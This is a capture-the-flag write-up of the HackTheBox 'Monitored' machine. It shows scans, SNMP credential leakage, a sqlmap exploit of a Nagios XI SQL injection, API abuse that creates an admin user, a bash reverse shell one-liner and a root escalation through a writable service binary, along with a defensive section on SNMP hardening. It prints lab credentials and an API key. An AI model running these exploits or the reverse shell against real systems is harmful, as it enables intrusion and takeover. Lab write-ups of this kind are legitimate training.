Monitored |HackTheBox

After a few days of grinding algorithm problems my head is fuzzy, so let's do some HTB for a change of pace.

Visiting 10.10.11.248 directly redirects to nagios.monitored.htb; add it to the hosts file.

Port scan with nmap:

```
nmap -p- -T4 --min-rate 1000 -A -oN ports.nmap 10.10.11.248
```

```
PORT     STATE SERVICE    VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
| 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp open http Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after: 2297-08-25T21:46:55
|_ssl-date: TLS randomness does not represent time
|_http-title: Nagios XI
5667/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/8%OT=22%CT=1%CU=40749%PV=Y%DS=2%DC=T%G=Y%TM=663AC
OS:F8B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=B)SEQ(SP=107%GCD=1%ISR=10B%TI=
OS:Z%CI=Z%II=I%TS=C)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M5
OS:3CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88
OS:%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF
OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=
OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%
OS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=Y%DFI=N%T=40%CD=S)
```

UDP needs a look as well:

```
nmap -sC -sV -sU -T4 -Pn 10.10.11.248
```

```
PORT      STATE         SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (unsynchronized)
| ntp-info:
|_
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 6f3fa7421af94c6500000000
| snmpEngineBoots: 36
|_ snmpEngineTime: 18h08m02s
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:389 0.0.0.0:0
| TCP 127.0.0.1:25 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.1:5432 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:162 *:*
| UDP 10.10.11.248:123 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-sysdescr: Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64
|_ System uptime: 18h08m2.61s (6528261 timeticks)
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
|_ 8:
162/udp open snmp net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5a44ab2146ff4c6500000000
| snmpEngineBoots: 27
|_ snmpEngineTime: 18h08m02s
1047/udp open|filtered neod1
1105/udp open|filtered ftranhc
19332/udp open|filtered unknown
22695/udp open|filtered unknown
32385/udp open|filtered unknown
49211/udp open|filtered unknown
61322/udp open|filtered unknown
```

A searchsploit query turns up plenty of vulnerabilities, but the exact version is unknown and they are all authenticated.

Directory brute-force with dirsearch.

It finds /nagios; visiting it also requires credentials to log in.

Back to the SNMP service found by the UDP scan:

```
snmpwalk -v 1 -c public 10.10.11.248 >result.txt
```

Found a set of credentials: svc / XjH7VCehowpR1xZB. Try logging in.
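From the defender's side, the lesson of this step is that a world-readable SNMP community hands out far more than uptime. With the default `rocommunity public`, net-snmp exposes the whole MIB tree, including HOST-RESOURCES-MIB `hrSWRunTable`, whose `hrSWRunParameters` column (.1.3.6.1.2.1.25.4.2.1.5) is the full argument line of every running process. Any secret passed on a command line (a `-p` password flag, a `--token` value) is therefore readable by anyone who can send a UDP packet to port 161 with the right community string. The snmpd.conf fragment below is an added example, not configuration from the box or from the writeup: it shows the weak default beside a restricted view. The community string, the monitoring host address and the view name are placeholders I chose for the example.

```conf
# --- weak (net-snmp default on many installs): every OID, from anywhere ---
rocommunity public

# --- hardened: expose only the system and interfaces groups, and only to ---
# --- the monitoring host; the community string is a placeholder          ---
view  basic included .1.3.6.1.2.1.1     # SNMPv2-MIB::system
view  basic included .1.3.6.1.2.1.2     # IF-MIB::interfaces
rocommunity  REPLACE_WITH_RANDOM_COMMUNITY  10.0.0.5  -V basic
```

Two notes on the design. First, the view is an allow-list: `hrSWRunTable` is excluded simply by never being included, so a future MIB addition cannot leak by accident. Second, restricting SNMP is only half the fix; the credential was still sitting in a process argument line, visible in `ps` to every local user. Services should read secrets from a root-only file or an environment file rather than from argv. Where SNMPv3 is available, replace the community entirely with a `rouser` entry at the `priv` security level bound to the same view, so that queries are authenticated and encrypted rather than gated by a shared string.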

The username and password are correct but the account is disabled; try the other login page.

Login succeeds, and the Nagios version shows as 4.4.13; no matching vulnerability for that version.

CVE-2023-40931:sealldeveloper/CVE-2023-40931-PoC: The sqlmap payload to exploit CVE-2023-40931 (github.com)

There is a SQL injection. The link above is the sqlmap PoC, and the username and password found via SNMP work for it.

```
sqlmap -D nagiosxi -T xi_users -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=1000" | awk -F'"' '{print$12}'`" --dump --level 4 --risk 3 -p id --batch
```

Got the apikey: IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

Use the apikey to add a new user to the system:

```
curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=1&password=1&name=1&email=1@1.com&auth_level=admin"
```

Login succeeds. Under Configuration > Core Config Manager, open the Commands panel and add a reverse shell command; it has to be wrapped in `bash -c`:

```
bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'
```

Then add a service under Services in the left-hand menu, select the command just created and run it to get the reverse shell.

`sudo -l` lists the commands that can be run as root.

The top entries are the nagios and npcd services; none of the scripts listed below them are writable.

Check the service status via manage_services.sh.

The npcd service invokes /usr/local/nagios/bin/npcd, and we can modify that file.

Stop the npcd service, then modify the file.

Start a listener, start the service, and receive the reverse shell.